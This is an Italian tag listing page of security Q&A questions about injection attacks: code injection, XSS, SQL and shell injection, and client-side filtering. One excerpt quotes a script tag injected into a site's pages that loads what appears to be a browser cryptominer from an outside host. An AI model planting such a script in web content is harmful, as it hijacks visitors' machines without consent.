Domande con tag 'injection'

1
risposta

Protocolli che sono altamente resistenti agli attacchi di iniezione di codice? [chiuso]

Dopo aver letto sulla sicurezza basata sulla lingua, sembra che i protocolli definiti usando grammatiche prive di contesto o regolari siano altamente resistenti agli attacchi di iniezione di codice. Esistono buoni protocolli di sicurezza priv...
posta 28.11.2013 - 18:31
1
risposta

Injected Javascript nel mio documento HTML

Recentemente ho notato il seguente javascript su molte delle mie pagine (di solito appena prima della chiusura del body tag): <script src="https://ethtrader.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=monerov.ingest.cryptok...
posta 08.06.2018 - 12:13
4
risposte

Software per l'hacking web? [chiuso]

Voglio imparare sql injection, xss e altri attacchi web. Sono nuovo di tutto questo, solo un principiante. Voglio sapere quale software usare. Posso usare Windows per questi attacchi e quale software devo usare? Sono venuto a conoscenza di alcun...
posta 09.07.2014 - 18:44
4
risposte

L'inserimento del codice è possibile in qualsiasi lingua compilata o interpretata?

Mi chiedo se sia possibile fare un'iniezione di codice in lingue compilate o interpretate? C'è qualche tipo di vettore di attacco in quest'area? Whit "code injection" Voglio dire fornire uno snippet di codice come input che verrà eseguito ins...
posta 15.12.2016 - 13:34
2
risposte

Protezione completa da iniezioni di script di shell (come una "Iniezione di Bash") - È persino possibile?

Supponiamo che ci sia un sito web creato con alcuni CMS FOSS (come Drupal) e la directory dei siti web è di proprietà e raggruppata da root (invece www-data come comune in Apache in Nginx) e un amico del proprietario del sito vede erro...
posta 03.01.2017 - 09:01
2
risposte

Possiamo considerare l'iniezione di tag HTML senza attributi evento come XSS?

Mi chiedo se possiamo considerare l'iniezione di tag HTML come a , image , img , video , audio , marquee o iframe senza un attributo evento come XSS ? Poiché non è coinvolto alcun JavaScript e quindi non è incluso e...
posta 17.06.2016 - 15:58
3
risposte

Come si verifica che uno script Python sia una pura funzione matematica?

Ho un progetto Python che carica dinamicamente script Python da una serie di directory specificate ed esegue una funzione prevista su di essi (il framework si aspetta un nome di funzione che richiede un certo numero di parametri, ma l'implementa...
posta 28.07.2016 - 18:00
2
risposte

È possibile filtrare l'input dell'utente sul lato del browser per prevenire l'iniezione?

Ho studiato i problemi più comuni relativi all'iniezione. È possibile incorporare un meccanismo di filtraggio per evitare il lato client dell'iniezione? Ad esempio, controllare l'URL della barra degli indirizzi per i parametri aggiunti malevoli...
posta 10.06.2014 - 17:34
1
risposta

Che tipo di exploit sta eseguendo un utente malintenzionato eseguendo lo snippet di codice?

Ho appena iniziato la codifica sicura. Qualcuno sa quale tipo di exploit sta eseguendo un utente malintenzionato eseguendo lo snippet di codice?     
posta 27.09.2018 - 10:22
1
risposta

SQL Injection è possibile in questo script di registrazione PHP? [chiuso]

Ho recentemente creato uno script di registrazione PHP per un sito web su cui un amico e io stiamo lavorando. Ho letto i pericoli dell'iniezione di MySQL e mi chiedevo se il mio codice attuale fosse protetto da tali attacchi, o se fossero necess...
posta 24.12.2014 - 07:24